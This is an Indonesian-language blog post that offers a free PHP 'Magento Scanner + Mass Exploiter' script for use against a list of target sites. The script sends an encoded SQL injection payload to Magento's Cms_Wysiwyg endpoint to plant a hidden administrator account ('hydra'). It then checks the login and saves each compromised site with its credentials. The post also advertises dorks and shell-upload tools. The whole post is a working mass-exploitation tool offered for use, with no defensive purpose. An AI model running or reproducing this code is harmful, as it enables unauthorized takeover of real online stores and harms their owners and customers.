Sunday, April 22, 2018

Cara menggunakan Magento Scanner + Mass Exploiter PHP 2018

 


[UPDATED 10:18 PM 5/13/2018]
kali ini gw mw share exploit magento versi PHP
udah di test work 100%

Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!

cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :

  1. <?php
  2. error_reporting(0);
  3. print '
  4.             #=============================================#
  5.             #       Magento Scanner + Mass Exploiter      #
  6.             #=============================================#
  7. ';
  8. $get=file_get_contents($argv[1])
  9. or die("
  10. \n\tError ! cara penggunaan? visit http://yuzanotes.blogspot.com/
  11. \n\tThanks to synchronizer\n\n");
  12. $j=explode("\r\n",$get);
  13. foreach($j as $url){
  14. $url1 = str_replace('http://','',$url);
  15. $url3 = str_replace('https://','',$url1);
  16. $url2 = 'http://'.$url3;
  17. print "\n\n\t[?] Scanning ".$url1.'..';
  18. $dirnya = "/skin/adminhtml/default/default/reset.css";
  19. $ch1 = curl_init();
  20. curl_setopt ($ch1, CURLOPT_URL, $url2.$dirnya);
  21. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  22. curl_setopt ($ch1, CURLOPT_TIMEOUT, 60);
  23. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  24. curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
  26. $result = curl_exec ($ch1);
  27. curl_close($ch1);
  28.  
  29. if(preg_match('/Magento/', $result)) {
  30. print "\n\t[+] MAGENTO : TRUE";
  31. print "\n\t[+] Exploiting ".$url1."..";
  32. $expage = "/admin/Cms_Wysiwyg/directive/index/";
  33.  
  34. $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  35.  
  36. $ch = curl_init();
  37. curl_setopt ($ch, CURLOPT_URL, $url2.$expage);
  38. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  39. curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  40. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
  42. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  43. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  44. curl_setopt ($ch, CURLOPT_POST, 1);
  45. $headers  = array();
  46. $headers[] = 'Accept-Encoding: gzip, deflate';
  47. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  48.  
  49. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  50. curl_setopt ($ch, CURLOPT_HEADER, 1);
  51. $result = curl_exec ($ch);
  52. curl_close($ch);
  53.  
  54. #Exploitasi berhasil dan memulai cek Login setelah exploitasi
  55. if(preg_match('#200 OK#', $result)) {
  56. print "\n\t[+] Exploiting Success, mulai mengecek login..";
  57. $loginpage = $url2."/admin";
  58. $logindata = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77';
  59.  
  60. $hydra_ch = curl_init();
  61. curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage);
  62. curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  63. curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60);
  64. curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1);
  65. curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata);
  66. curl_setopt ($hydra_ch, CURLOPT_SSL_VERIFYPEER, 0);
  67. curl_setopt ($hydra_ch, CURLOPT_FOLLOWLOCATION, 1);
  68. curl_setopt ($hydra_ch, CURLOPT_POST, 1);
  69.  
  70. $headers  = array();
  71. $headers[] = 'Accept-Encoding: gzip, deflate';
  72. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  73.  
  74. curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
  75. curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
  76. $hasil = curl_exec ($hydra_ch);
  77. curl_close($hydra_ch);
  78.  
  79. if(preg_match('#302 Moved#', $hasil)) {
  80. #Exploitasi berhasil dan admin user baru benar benar masuk ke database.
  81. $fp = fopen("vuln_magento.txt", "a+");
  82. fwrite($fp, "========================================\n");
  83. fwrite($fp, "WEBSITE  : ".$loginpage."\n");
  84. fwrite($fp, "USERNAME : hydra\n");
  85. fwrite($fp, "PASSWORD : hydra77\n");
  86. fwrite($fp, "========================================\n");
  87. fclose($fp);
  88. print "\n\t[+] Login Success ! \n\t[+] username   : hydra  \n\t[+] password   : hydra77";
  89. print "\n\t[-] Login Page : ".$loginpage."\n";
  90. }
  91. else {
  92. #Exploitasi berhasil dan namun admin user tidak masuk ke database.
  93. print "\n\t[-] Login Failed :( ";
  94. print "\n\t[-] Keterangan : admin user tidak masuk ke database.\n";}
  95. }else {
  96.  
  97. #Exploitasi gagal total
  98. print "\n\t[-] Exploitasi Failed :(\n ";}
  99. }else {
  100. print "\n\t[-] MAGENTO : FALSE\n";
  101. }
  102. }
  103.  
  104. ?>

Dork magento, auto exploit magento versi web, smtp, upload shell, dll. masuk kesini

visit terus iya blog ini, klo prlu di bookmark biar ga lupa hehe, jgn lupa tinggalin komeng :)
di sini gak da yg namanya priv" an :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

TAGS
Next
Prev Post
Previous
Next Post
Mbreww

About Mbreww


Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :
    Choose :
    • OR
    • To comment
No comments:
Write comments

IBX5AAE15B0D944A
© Copyright 2015 Mbreww Bloger's. Designed by Bloggertheme9. Powered by Blogger.